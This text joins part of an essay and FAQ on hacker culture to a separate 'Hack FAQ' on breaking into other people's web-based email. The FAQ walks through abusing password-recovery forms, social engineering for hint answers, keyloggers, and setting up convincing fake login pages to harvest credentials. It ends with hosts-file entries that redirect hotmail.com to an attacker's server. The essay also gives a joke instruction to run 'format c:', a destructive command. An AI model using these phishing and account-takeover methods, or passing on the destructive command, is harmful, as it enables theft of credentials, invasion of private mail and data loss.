To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation. From a new user's point of view, all Linux distributions are pretty much equivalent.

You can find BSD Unix help and resources at www.bsd.org.
I have written a primer on the basics of Unix and the Internet.

(Note: I don't really recommend installing either Linux or BSD as a solo project if you're a newbie. For Linux, find a local Linux user's group and ask for help.)

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

This is very true.
Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.

Status in the Hacker Culture

1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.
There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us, by at least a 2:1 ratio according to web content analysis, now prefer the term “open-source” software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available. Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs to be done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for a while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘nerd’ and even use the harsher term ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations. See The Geek Page for extensive discussion.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine.
This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

Study Zen, and/or take up martial arts. (The mental discipline seems similar in important ways.)

Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Other Resources

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers. If Peter's site doesn't respond, the following Excite search should find a copy.

There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.
Rick Moen has written an excellent document on how to run a Linux user group.

Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.

If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.

When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.

If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.

Frequently Asked Questions

Q: Will you teach me how to hack?
Q: How can I get started, then?
Q: When do you have to start? Is it too late for me to learn?
Q: How long will it take me to learn to hack?
Q: Are Visual Basic or C# good languages to start with?
Q: Would you help me to crack a system, or teach me how to crack?
Q: How can I get the password for someone else's account?
Q: How can I break into/read/monitor someone else's email?
Q: How can I steal channel op privileges on IRC?
Q: I've been cracked. Will you help me fend off further attacks?
Q: I'm having problems with my Windows software. Will you help me?
Q: Where can I find some real hackers to talk with?
Q: Can you recommend useful books about hacking-related subjects?
Q: Do I need to be good at math to become a hacker?
Q: What language should I learn first?
Q: What kind of hardware do I need?
Q: I want to contribute. Can you help me pick a problem to work on?
Q: Do I need to hate and bash Microsoft?
Q: But won't open-source software leave programmers unable to make a living?
Q: How can I get started? Where can I get a free Unix?

Q: Will you teach me how to hack?

A: Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and traveling as an open-source advocate, take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.

Q: How can I get started, then?

A: The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q: When do you have to start? Is it too late for me to learn?

A: Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q: How long will it take me to learn to hack?

A: That depends on how talented you are and how hard you work at it. Most people can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q: Are Visual Basic or C# good languages to start with?

A: If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. Don't go there. It's ugly, and it never stops being ugly.

There are specific problems with Visual Basic and C#; mainly that they're not portable. Though there are prototype open-source implementations of these languages, the applicable ECMA standards don't cover more than a small set of their programming interfaces. On Windows most of their library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use — more careful than any newbie is really capable of being — you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available.

Visual Basic is especially awful. Like other Basics it's a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.

One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in.

Q: Would you help me to crack a system, or teach me how to crack?

A: No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring.
Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q: How can I get the password for someone else's account?

A: This is cracking. Go away, idiot.

Q: How can I break into/read/monitor someone else's email?

A: This is cracking. Get lost, moron.

Q: How can I steal channel op privileges on IRC?

A: This is cracking. Begone, cretin.

Q: I've been cracked. Will you help me fend off further attacks?

A: No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.

Q: I'm having problems with my Windows software. Will you help me?

A: Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes.

Q: Where can I find some real hackers to talk with?

A: The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q: Can you recommend useful books about hacking-related subjects?

A: I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.

For an introduction to Python, see the introductory materials on the Python site.

Q: Do I need to be good at math to become a hacker?

A: No. While you do need to be able to think logically and follow chains of exact reasoning, hacking uses very little formal mathematics or arithmetic. In particular, you won't need trigonometry, calculus or analysis (we leave that stuff to the electrical engineers :-)). Some grounding in finite mathematics (including Boolean algebra, finite-set theory, combinatorics, and graph theory) can be helpful.

Q: What language should I learn first?

A: XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.

But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed.

C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.

Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.

Q: What kind of hardware do I need?

A: It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true some time ago; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.

The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for most modern machines. The only real sticky area is modems; some machines have Windows-specific hardware that won't work with Linux. There's a FAQ on hardware compatibility; the latest version is here.

Q: I want to contribute. Can you help me pick a problem to work on?

A: No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works.

Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think "Cool! I'd like to work on that!", join it.

Q: Do I need to hate and bash Microsoft?

A: No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.

Q: But won't open-source software leave programmers unable to make a living?

A: This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q: How can I get started? Where can I get a free Unix?

A: Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...

________________________________________________________________________

Hack FAQ Volume 9
credited to Wang
Frequently asked questions about hacking and computers

Whoa...volume 9 - how did things get this far? lol. I wrote volume 1 as a one off just to get the things that I knew off my chest - and now we are 9 volumes in...can't be a bad thing!

Ok, since the last volume I have been busy with real life and Mod-X (which has become really popular/busy now).
I also decided to cover a certain topic this volume - hotmail and web based email. Lol, finally broke me down. 60% of the reports through the hack faq question form as to do with hacking hotmail or web based email related questions. Sad thing is, most people out there seem to think I have an instant password decrypter for them or something - which, as you will read, is not the case! Ah well, its covered now...so hopefully I can ignore people who ask those questions now :) Anyhow, enough of my poor excuses :) - enjoy the volume and please keep requests topics to be covered. One thing though - when you use the request topic form on the site - please actually submit a topic to be covered! I get too many "Please tell me how to break into this" email messages. Ideally I want emails through like "Please could you do a topic covering this:"...as opposed to people just out for me to solve their personal problems :) If you have any topics you want covering, please email me at wang@most-wanted.com and I will consider putting them into the next volume, or you can fill in my online question form on the site. If you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously). If you want to join our mailing list and be notified as soon as a new Hack FAQ is released, you can sign up by clicking here -------------------------------------------------------------------------------- Jump to a topic: Hacking Web-based Email Unix Ownership/Permissions explained What are SUID Binaries and why are they dangerous? Decrypting Trillian Passwords What is Cross Site Scripting (css/xss) ? 
Problems with user input in scripting languages using databases (SQL statements)
Emails

--------------------------------------------------------------------------------

Hacking Web-based Email

Oh boy...I knew we would have to cover this at some stage :) - just having the words "hacking web-based email" on the site will bring the server loads more hits...why? Because there is something about reading another person's email that fascinates hackers/husbands/wives/boyfriends/girlfriends/students etc etc. I will also take this opportunity to state that the information here is intended for use by you, to judge the security of your own web-based email account - and hopefully fix any blatant mistakes you have made during signing up for web-based email. This is not intended to be used to break into accounts that you don't own.

What exactly is web-based email though? Is it the email you get through Outlook Express or your preferred mail client? No. Web-based email is the name associated with sites like hotmail.com, mail.yahoo.com, another.com, email.excite.com etc etc. They are all sites which provide you with your own email address, and allow you to check your email and send emails by logging into their site and doing all your email tasks via your web browser. They are extremely popular with most internet users, simply because of their ease of use, and ease of access. When you use an actual email application from your pc (such as Outlook, Outlook Express, Eudora, Netscape Mail etc) you are usually dealing with POP3 email (which is accessed by your mail application connecting to the POP3 daemon of a mail server, usually via port 110). POP3 email is not what we are dealing with today - we are merely interested in the web-based email services that you access via your web browser.

"How do I hack web-based email" must be the most frequently asked question by aspiring hackers - a lot of us have asked someone that very question in the past...and usually been met with a bad response.
Why is it so commonly asked? At a guess...it's because web-based email is, for a lot of people, the only thing they use the internet for. It's easy to use, quick to set up, and more importantly...most people you know also have accounts at some web-based service on the net. And that is the real reason...most people simply get a thrill out of the idea that they might be able to "spy" on people they know. Like the world's fascination with fly-on-the-wall television programs...reading someone's email is interesting, it's an invasion of privacy - and more importantly, you can see private exchanges of information between people.

However, I am babbling on - you already know all this...which is why you want to know HOW it's done...not why. It's likely that you are already aware of most hackers' views of the question "how do I hack hotmail?" - and some of you may be mystified as to why they either flame you back (i.e. send abuse back to you), kick you from a chat room, or make fun of you. Why? You asked a perfectly good question right? - and yes, you did...it's just that it seems this subject scares a lot of people, because despite how good they think they are...they don't know the answer to your question.

There is another reason though - the question is also ignorant. A lot of people who send me the question via the hack faq form on the site expect there to be a simple, almost magic (lol) method to get into web based email...they seem to almost expect a reply from me to say "oh yeah, just type this into that box and you will be into their account, no problem". This of course, could not be further from the truth. The simple fact is - there is no magic way to get into everyone's web-based email. There is no secret technique, or super-program that breaks into all hotmail accounts - it's done on a case-by-case basis...and a lot of it is luck. The chances are, what I will cover today will not get you into your friend's email account (I am quite glad that is the case!)
- but on the other hand, it just might. There are 4 or 5 clear techniques that hackers use to eventually gain access to a target's email account. I will cover each one of them individually:

Technique 1 - Lost Password Requests

Wow, lost password requests! What a great idea! With so many users signing up, then forgetting their passwords the next day, something needed to be implemented to ensure users had a way of being given/remembering their lost passwords. There are a few different methods that various email services use to handle this type of situation:

Send over email - Some email services require you to already have another email account elsewhere, like a POP3 account with your ISP or similar. If you forget your password to access their web-based email service - they will then send the forgotten password to your other email account. Seems like a good idea...but how effective is it? Imagine a hacker gained access to your POP3 account - they could then request the lost password from your web-based email account (and probably a lot of other services you are signed up to) - and just from knowing the POP3 password, suddenly have access to everything. You also have to remember that they are sending your full password out via email! Unencrypted...for anyone who hijacks the email to see. What if the 2nd email account you gave the web-based email company when you signed up becomes inaccessible at a later date? You are stuck without being able to request your lost password to a place where you can read it. Some services won't even let you change that initial 2nd email you signed up with too :( My main problem with this technique is the whole string of security problems that arises if a hacker gains access to one of your email addresses, and can then request lost passwords from other accounts you have, to that email. As a result of this - I will rate this technique: Security 2/5 Practicality 4/5.
Hint Questions (full recovery) - Some services decide to ask you 1 or more questions when you sign up, such as "What is your mother's maiden name" etc - questions they think that only you will know the answer to. Some web-based services that use this technique are poorer than others, for example - some have predefined questions, like you will be asked "What is your mother's maiden name" - and that's it, you have no choice. This is a bad thing since you might be thinking "arghh!! tons of people know the maiden name...please ask me something else!". Some are better, and let you choose from a range of questions which one you want to answer. This is good because you then at least get the choice...although some of the questions can be so poor that you would be better off just giving your password out freely! Lastly, the best versions of this technique let you actually enter your own question, and your own answer. These are great, since you can pick something that absolutely no-one else will know. So, what are the downsides to this...well, let's be honest - you selected your own password, and you forgot it...so what's to say you aren't going to forget your hint question's answer too! I know people that have done this. Also, your hint question is only as strong as you make it. Some questions I have seen have been pathetic (ones like "What is your date of birth") - and unless you lie...you know someone in the world is going to know it. However, this does create another issue - you can simply lie about the answer to the question...that way, providing you remember your lie, no-one else should know the answer to the question, even if they think they do. As you can see, this technique really depends on you, and more importantly the flexibility the web-based email service provides over the hint question.
The reason I label this "(full recovery)" is because I am referring to the version of this technique whereby you enter your hint answer correctly - and the email service presents you with a message telling you your lost password. In my opinion...this is bad, because say an attacker went through the lost password process, got the answer right, and then was presented with the password - you now both have access to the service, and the attacker can read your mail whenever he/she wants...without you being any the wiser. As a result of this, I will rate this technique: Security 2/5 Practicality 3/5.

Hint Questions (Reset) - Same as above, but when you get the hint question right - it doesn't tell you the password you had forgotten...but instead resets the password to a completely new, random password. This may not seem that good, and may seem a bit of a pain - but when you think about it...at least you know when someone has broken into your email. You would try to log in, and realise your password had changed...you could then inform all of your associates/friends/family that your email seems to have been broken into...and they can stop mailing that address (or wait for you to sort the issue out). It's not great...but at least you know you aren't being spied on. As a result of this, I will rate this technique: Security 3/5 Practicality 2/5.

Password Reset - What can I say - terrible. You forget your password, click "lost password" - and it simply changes your password to a new one. I can't believe anyone would ever use this...but I have seen it in operation :( In practice, it means that you know when you have been broken into...but, it means that feasibly...anyone can break into you and prevent you from reading your email. I did see another variation of this where it emailed your 2nd account (that you gave the web-based email service when you signed up) saying "unless you visit this enclosed link - your password will be reset in 48 hours".
That was...better...I guess, but still awful. The only thing this technique has going for it is that a hacker may be reluctant to reset your password so you can't get in - because they know it's a clear sign that they have been there. I will rate this technique: Security 1/5 Practicality 1/5.

Create a new account - Defeats the point of a lost password facility - but security wise...it's the best. If you forget your password, you have to create a new account. Inconvenient - yes! But, perhaps it will make you think more carefully before selecting a password you can't remember ;) I will rate this technique: Security 5/5 Practicality 1/5.

Ok...now you know the most common forms of lost password systems - let's talk about why they are useful to a hacker trying to break into an account on a web-based email service. On visiting the web-based email site, a hacker would first look for a lost password link. Sometimes it's there, linked to straight away - and sometimes you need to submit one or more incorrect login attempts first, in order to be given the link. Firstly, the hacker will look at what kind of lost password technique is in use on the site (from the techniques explained above). Try it out...and see what it does when you tell them you have lost your password (remember that the majority of sites will log your IP address when you request a lost password, and maybe even send your IP to the real owner of the account via email or similar). If it sends it via email to a separate address (technique 1 explained above) - then does it tell you which email address it has been sent to? Or does it just say "your password has been emailed to your address on record"? If it tells you the email it has been sent to - this is bad for the real account owner...since the hacker then knows exactly which other email address of yours they need to break into (and remember it might be another email of yours they already have access to).
If it's the hint question technique - see what the question is - you wouldn't believe how many I have looked at only to see the question "what is your favourite colour?" - that's terrible, guessable within about 3 attempts. If it's a more personal question, like "when is your birthday?", or "what is your postcode?", or "what is your mother's maiden name?" then the hacker will undoubtedly try to social engineer the information out of you. Social engineering is another topic altogether - but just so you know, social engineering is when someone tries to trick another person into revealing the information they want. For example, to get the person's birth date I need to get into their web email - I might track them down on IRC and talk to them for ages, make friends etc....and somewhere along the line, slip in the question asking when their birthday is. It is *unbelievable* how easy social engineering is sometimes, and there are zillions of techniques people use - ranging from the simple one I just described, to setting up false web sites etc to catch people's details...no joke. The other issue is, if it's a friend/colleague trying to get into your email - the chances are they already know a lot of your personal information - be careful. In general, people say passwords are the weakest link in the security chain - but lost password techniques are often the key to gaining access.

Technique 2 - Social Engineering

As I stated above - social engineering is when someone tries to trick another person into revealing the information they want. The most common "hacker" social engineering is when someone talks to you about hobbies/pets/family etc...in the hope that by knowing your pets' names etc, they might be able to get into your accounts (if you used your pet's name as a password). You wouldn't believe how effective this is.
There are varying levels of social engineering - but it can go as far as people setting up fake websites and emailing you to tell you about a brilliant new web site you need to sign up to ;) - then when you do, they catch all the details they need etc. It can also end up with people phoning you, pretending to be from a company doing a survey. Social engineering is an old form of hacking, which hasn't dated (human stupidity keeps it alive) - and you can even see it in Hollywood films such as "Hackers", and "Takedown". Social engineering to just get a password is a bit hit and miss - because you don't really know what information you need to get out of the target. However, when combining social engineering with a lost password form that has a "hint question" - you know exactly what information you need to get out of the target person (you just have to hope they haven't lied when they answered their hint question!).

Technique 3 - Site flaws

Earlier, I said that there was no magic way to get into everyone's email. This isn't entirely true. From time to time (like with any site/server on the web) - flaws arise. When it comes down to it, the web-based email web site has to be hosted on a web server somewhere...which is likely to be either IIS 4/5 (the Windows NT/2000 web server) or Apache (mostly *nix, but also runs on a lot of Windows systems on the net). As a lot of you will know, IIS flaws aren't exactly rare ;) - and Apache has major scares every now and then too (some bad ones recently). When an exploit in the server appears on a popular security site in the form of an advisory, there will be a gap before the server running the web-based email is patched. Hotmail etc will be patched almost instantly...giving you no chance. However - there are a lot of web-based email providers that are slacking...and leave themselves open to you to not only hack 1 account...but the whole server, and all accounts :( - awful really.
Aside from server flaws - there are the inevitable script flaws. Hotmail has had its fair share of them, as have all web-based email providers. The problem is - providers like hotmail have learnt the hard way, they had lots of flaws (silly ones) early on, and are now...shockingly...pretty secure. If you want to look over the kinds of flaws that were present, try searching some security sites for "hotmail javascript" or similar - you will see some details on an old hotmail flaw that meant a person's hotmail session could be hijacked if a malicious user sent the account an email with some malicious javascript code in. No system is ever 100% secure - and I promise you, hotmail (and all the other sites) will have more security flaws as bad as this in the future...it's just a case of how fast you can find out about it and use it to your advantage. Hotmail, for example, usually patch the flaw within hours :( - so this isn't exactly a concrete solution to breaking into accounts. Excite mail recently had a php session flaw which could lead to account hijacking...it just shows that these flaws are still there waiting to be found.

Technique 4 - Trick Emails

This is pretty lame...but human stupidity sometimes leads it to work. A lot of attackers simply sign up for email addresses like "lost_password@hotmail.com" or "administrator@excite.com" etc - anything they can think of that makes them look like a member of staff from the site. They will then email you trying to trick you into giving them your password for some reason, or trick you into going to some site somewhere and giving out your password etc. Email providers shouldn't ever need to ask you for your password - bear that in mind.

Technique 5 - Software flaws

Knowing someone's password is only one way of getting into someone's account.
When they log in, the site knows they are logged in by checking their cookie or session data (depending on how the login works, since some sites will only store user info in cookies if you select to do so, like with a "remember my password" checkbox or similar). So, if an attacker steals your cookies/session information - they can walk into your inbox. I doubt I need to tell you how many Internet Explorer flaws there are coming out every month (that's not to say that other browsers such as Netscape/Mozilla/Opera aren't having their fair share too...just not as many!). A lot of the flaws allow the attacker to execute code of his/her choice on your system, or steal information/data. So another option would be for an attacker to try and exploit the account owner in another way first. They might send you an email asking you to go to another web site - and then when you do, the page attempts the exploit on you. This is fairly common. I won't go into information gathering here - but someone with their own web site could also (to a certain extent) determine your IP address, what browser/OS/mail program you are using, just by getting you to go to their own site. They will then know what exploits to try on you, if you're not clever and not patched. Cross site scripting (css/xss) is also a common cause of cookies being stolen, and sessions being hijacked - but we have a whole topic dedicated to that this volume, so I won't explain it here. Therefore staying on top of security flaws in software you use is another way to avoid getting your email hacked (sign up for the weekly security newsletter at net-security.org). The point is, stealing cookies/session data via software flaws is also a common way to get into web-based email.

Technique 6 - Trojans/Keyloggers

This technique is closely linked with the last technique, since a trojan/keylogging program would often be installed on you without you knowing, via an exploit in your browser/mail program etc.
However, a lot of people are simply dumb and run all executable attachments from emails they receive ;( When someone has you trojan'd or a keylogger on your pc, they just have to wait until you send the relevant password data from your web-based email login to them.

Technique 7 - Fake web sites

I sometimes also see this referred to as "Password Harvesting". This technique involves you having your own web space somewhere - hopefully somewhere which isn't too obvious such as geocities or somewhere (this works best if you buy your own domain/hosting that looks authentic, for example email-login.com or something). You then copy the html for the login page of the email provider that your target uses (i.e. copy the hotmail.com login page to your hard drive for editing). Then, the attacker modifies the login page, so that it submits information to his own scripts on his site, before probably redirecting you to the real web-based email site. Got the idea yet? Yes...you fool the account owner into logging into your "fake" login screen on your server, it logs his/her details, then sends him to the real site - where he probably logs in again thinking the login just failed the first time (but we know differently) - and that's it...the login will succeed for them the second time on the real site...and they are none the wiser. There are a few ways this can be made more authentic. Firstly, as I mentioned - the site with the fake login screen should be a believable URL (since this technique relies on you fooling the account owner into thinking it's ok to log into his email from your site). If you register a domain like email-login.com or something...it might work, for example. It can also be made more realistic with a few small touches - like for example, when they submit to the form on the "fake" site - you send them to the "wrong password" screen, on the real server...so it looks like an authentic bad login.
It's also sometimes possible to actually make a real request to the real server with the information they entered on the fake site, so that the login succeeds on the real site! That's the best way, since they then have no clue as to what has happened. This is an extremely dangerous technique, it relies on user stupidity and requires you to somehow fool them into logging in through your fake site...but it often works. User stupidity prevails ;)

Technique 8 - Hosts hack/trick

Firstly, what is the Windows hosts file? "The short answer is that the Hosts file is like an address book. When you type an address like www.yahoo.com into your browser, the Hosts file is consulted to see if you have the IP address for that site. If you do, then your computer will use that IP and the site will open. If not, your computer will ask your ISP's (internet service provider) computer for the IP before it can access that site. Most of the time, you do not have addresses in your "address book," because you have not put any there. Therefore, most of the time your computer asks for the IP address from your ISP to find sites." The hosts file is located in "c:\windows\hosts" for Windows 9x/ME systems, and in "c:\winnt\system32\drivers\etc\hosts" for Windows NT/2000/XP systems (if it doesn't exist you can create it, but it should exist) - open it in notepad. It's not uncommon for the file to be blank, but typically it may look something like:

127.0.0.1 localhost
212.38.191.83 www.mod-x.co.uk

So, as you can see, the format is: the IP address, followed by whitespace, then the hostname. Can you see where this one is going? ;) - this technique should be used in conjunction with the previous technique. This is the key to the problem of fooling someone into going to your "fake" site, instead of the real web-based email login.
Let's say I set up my fake hotmail login page on my www.mod-x.co.uk server, whose IP is 212.38.191.83 - if there was an entry in my target's hosts file that read:

212.38.191.83 hotmail.com
212.38.191.83 www.hotmail.com

